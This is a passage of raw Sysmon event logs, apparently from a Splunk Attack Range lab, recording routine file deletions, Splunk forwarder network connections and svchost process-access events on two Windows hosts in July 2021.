Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809651Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:33.928{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17E5AC60D8F8912F6270D194AB0C78DC,SHA256=84F599ABC0D8A9C8D620525CC4E7ABBF63B843A30730628F8D8CE56D788FC901,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:33.463{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=226AF6FE7ED06B9DC8BCA67EE3FB65D7,SHA256=1D10A210B49C2049DEFB5910086810CEFED694384DCC145D69DB5E4BCB89390B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809652Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:34.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6AA66FC20798E7C44DB258BC5B854B0,SHA256=4BCB6BBDEE84A073279E3C2497E8C516E2DF3DCB0D1D1AE0EAA4186E05EB0891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:34.464{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2AC566CD64BE6CA1BAD9644BBBADCC2,SHA256=0A2384046DA57454D0BD155853E9D48B43687DCB17454E736731F4D5F812F216,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809654Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:35.932{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2B1041D8791A314E9ABB2EFF5557BD1,SHA256=DFFC2DD755E3B690C077146D83AE92AAD9BCFFD3A5C8C424F0A43DF5E40218C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:35.464{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9C557C1B8C4E4BD89E02DFCFB1B096B,SHA256=39447A45F630A21CBFF28E07EFD4D900BA5511AA09B756E24E9367A71F4B4B5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809653Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:33.325{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57409-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809655Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:36.947{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D502360AC859AE9BCD758C1791E6860B,SHA256=A87F57632398B2A4875BB797C6E73986644F2AB2BE1E28C41DCFE1592C551B73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:36.465{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C65EAC4BCB75BCABCFC7D186CCFD5C2,SHA256=DDC92B9DDCAFEADB13D662F212512741B302EB2A3E96768FA619B52C12A0AF07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809656Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:37.963{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D72D47916ED3827AF907F5F7EA277AE,SHA256=96530854700E8FF12CE8A4166CC59F70CCF605FFF831B015F73BF44676EE22C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:28.733{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61903-false10.0.1.12-8000- 23542300x80000000000000001053085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:37.482{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEE5E68F13CE1445E613A0D9A4EDDB0A,SHA256=0F1D869727047C738840B2E172C3BB5B1D518AAC8FC2B5403BC20B40E7AA39BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809657Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:38.963{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FEF5DB20B3DECB76F2B0D1FEF55032F,SHA256=65A79E2C4B944C2C6DD0A1E8D4B3757E721F54FB7AD53E0CC025EEA3C73695DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:38.633{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=660189D7D9315AEDF23D4AEDD6D312C9,SHA256=DCE690DB71A47F83220E3C198FC9D82FF3475C1F59CC1AA1D29701F66AC48C3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:38.502{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF6764E837DF8BE779ADA9CE751F5B3E,SHA256=5E898912DA90A19542BCEBB9EAE8071012EADB6D6C93AE64A0F663C8FC7553D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809658Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:39.979{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D439DF53E4D36E16BDB960820BBDD0,SHA256=765B3277A0B03A184194A7E50E1280C33CB2CDECE0F547E9CD3303536F7B5C92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:39.517{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85CA447E0663647B98FC524BC9FF2AE7,SHA256=485619CF03E209172EAC7058940C8B744D51525A3A6EA25E4B327EFC9FF5C557,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.886{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EAEF22D0AC09A24B87A02B1ACF2EDC47,SHA256=D8869C64BB10AC1EB7951DC010F19BA6EF862413B2BA4EDF9D6550EADB33D4E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DF575C60D04FE071FEA718616158DAC5,SHA256=06598E180AE0FDD72EC4D3800415AE3D9E43DF20FEF97CBC62106CAB297D686F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=67E470882D34E342DDA051C92BC6221D,SHA256=9CCBF03FBDB9691DE445D84C288298B736B0C22FFE11A7195EB4D138AB2C4B60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1C4F879DB0FA9F76EEFF2A6C3C8A5574,SHA256=B29743C2793451FBE712E291345594656B9D1E3966821EB92B05CE04153ACCA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6BE9E9DD170CF8B36A0AD45CDC6615BA,SHA256=76ADB337A1B633FAAADD069C0D57648D24F3C747C634E47DF053250F35B28A97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1C4FE2AC90A3B2E7128E30CBDE6F1BEA,SHA256=EFBE0DC73FC4BE8A25878372836536246BCA4D887E4548B6E8E0E6EC9AA6C2CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A9715BE816A71A92AD7A04172D20C17B,SHA256=5B5CC79AE6D5CB54D8B1171A8D8DC98360B4AD0F5B8E4F8F22D44EFEA9CCCF93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A935D7AD3446F5C43700FE3357F768FE,SHA256=BF379992EA6539C5CCCEA1167A337F1A6E4A85E77497A2B82B616E3843EE0A29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3C232A292A27CEC34B15E21141520ED3,SHA256=7DDA69CC91D8C4CD99B3209CFBE26C6DBA992FAFAAC567F089BC4BA46DB13233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4046E3C1E001C64406FE81F5F68D32A6,SHA256=D01F8ACAE9D9A8939CEF7C21404F82E2AA54DEDCAAF93784D356520763C29F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6E77792229C90CBCCA5A7159C79C5E41,SHA256=82F6189E93CD0DED1F3E90DFD7D26C27C7BABB937B69BE309D7AAA41A7ED72C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:40.518{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAD459B95E8A276A901AE17AE8D6C4AF,SHA256=64B1606C865D0588D6BD5AC5CA23EAA21D0C446E2B69BE33B29C6702E547DB7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809659Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:39.330{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57410-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:41.533{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE55A9682FD36D828717D37112E98581,SHA256=FDA8AFA6FF08236DD7A79230A561B58BB5374434FE7412DDFE7F3FED28065AEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809660Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:41.025{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6398434113D0402D253206E5DB19754,SHA256=0E1A1AE41591BC113FD58523A4153614D5AACE9700193AF92E3E4A54E28C9313,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:41.486{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:41.482{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:41.482{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:42.547{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5E473AF07E8E531A0D4E7E0E9E8F710,SHA256=D7D70A52C62EC52C8B1C60726DC11EAFC7207F7195C200F387B6A47576438547,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809661Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:42.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA9150D09F40C1C9A84AB315FA2225F0,SHA256=9149604908A82288E40D92B20F104810DC119C88DBEF1EEF691FF8E03E396E79,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:34.664{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61904-false10.0.1.12-8000- 23542300x80000000000000001053108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:43.563{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3874839FA646885CBA96BE1E6DB5F6F0,SHA256=0D52F69F7419A68718E594DD58348F469D29FCA7A8A962A7923FE4EE95A526A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809662Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:43.072{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBEB222600D252CB05D671453543B35E,SHA256=219CB6EC40E5B3E4F7CC35E47AF786AA1590A6B0591C654776A4FCF404EDBFCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:44.581{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF4116EA53B2FDF3FF59D300DE15042C,SHA256=7D10C28B8593D1B6E90E115C9E3664EA0F003F30810B839EE8D471F0A933CEF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809663Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:44.088{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBAB453F8E826E8DD30DFEE6A1A4ECCA,SHA256=CF9B457A47C2A9BE4BE6B33CDAE00B8AFDEF2450C300BA8B430F8B42478622A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:45.599{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DDFF848134B81CD90D1E1275CE3B8BF,SHA256=D13F08534ABF5FAAD4575FE59557F22F29D5B07964670040F53E4B374D626895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809664Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:45.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14AA484C9D7B853032A8F987171437B7,SHA256=A7BF2F08E162B13C4AE37DB963C154D99324F7F93139AC955D03E5D0939B06B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.630{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16F8514531DA63107324E6D13093F400,SHA256=4AD66801065064FD32A5FBC2A0D2D0FB2532288631C35DB9B72A7577C962A9FE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809665Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:46.166{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A83A3B3F489C402B48A340858F276C29,SHA256=C262C17198740AA7A73D7A5871460AB96E1604DE12B0B5E00B8042321708DD92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.661{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A51FE7C55AC304DCB98952254CEF0E9,SHA256=54BDA52A5FB332CECBA7F77540A4996E014508E3CF86DCDA22DB2F37FDEFFF62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809667Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 